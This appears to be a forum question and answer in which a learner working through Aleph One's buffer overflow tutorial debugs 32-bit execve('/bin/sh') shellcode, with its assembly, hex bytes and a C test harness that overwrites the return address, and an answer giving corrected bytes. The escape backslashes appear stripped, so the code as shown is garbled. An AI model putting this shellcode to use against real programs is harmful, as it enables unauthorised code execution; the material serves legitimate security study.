I am trying to implement the codes given in smashing the stack for fun and profit by Aleph to learn the basics of buffer overflow attacks.
Machine architecture: Ubuntu 12.10 64 bit
programs compiled using -m32 flag in gcc
So far, I have managed to spawn a shell using the assembly instructions. The next step is to convert those instructions into hexadecimal code, where I have encountered this problem. The assembly code for spawning the shell:
void main() { __asm__( "Start:" "jmp CallCodent" "CallPop:" "popl %esint" "movl %esi,0x8(%esp)nt" "xorl %eax,%eaxnt" "movb %al,0x7(%esp)nt" "movl %eax,0xc(%esp)nt" "movb $0xb,%alnt" "movl %esi,%ebxnt" "leal 0x8(%esp),%ecxnt" "leal 0xc(%esp),%edxnt" "int $0x80nt" "xorl %ebx,%ebxnt" "movl %ebx,%eaxnt" "inc %eaxnt" "int $0x80nt" "CallCode:" "call CallPopnt" ".string "/bin/sh"nt" ); }
Corresponding hex code is:
#include <sys/mman.h> #include<stdio.h> #define PAGE_SIZE 4096U char shellcode[] = "xebx24x5ex89x74x24x08x31xc0x88x44x24x07x89x44x24x0cxb0" "x0bx89xf3x8dx4cx24x08x8dx54x24x0cxcd" "x80x31x89xd8x40xcdx80xe8xd7xffxffxff/bin/sh"; void test_shellcode() { int *ret; // The data section is non-executable // Change protection bits for the page containing our shellcode mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)), 2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC); ret = (int*)((char *)&ret + 16); (*ret) = (int)shellcode; } int main() { test_shellcode(); return 0; }
A bit of analysis using GDB Debugger led me to these results:
(gdb) run Starting program: /home/peps/CCPP/Hello/testsc3 Program received signal SIGILL, Illegal instruction. 0x0804a067 in shellcode () (gdb) x/s 0x0804a067 0x804a067 <shellcode+39>: "377377377/bin/sh"
After applying breakpoints, I think the problem lies somewhere in the hex code, which I have not been able to figure out. Also, I don’t seem to understand the context of Illegal instruction here.
Any help would be appreciated.
Advertisement
Answer
You made a couple of mistakes in your shellcode.
char shellcode[] = "xebx24x5ex89x74x24x08x31" "xc0x88x44x24x07x89x44x24" "x0cxb0x0bx89xf3x8dx4cx24" "x08x8dx54x24x0cxcdx80x31" "xdbx89xd8x40xcdx80xe8xd7" "xffxffxff/bin/sh";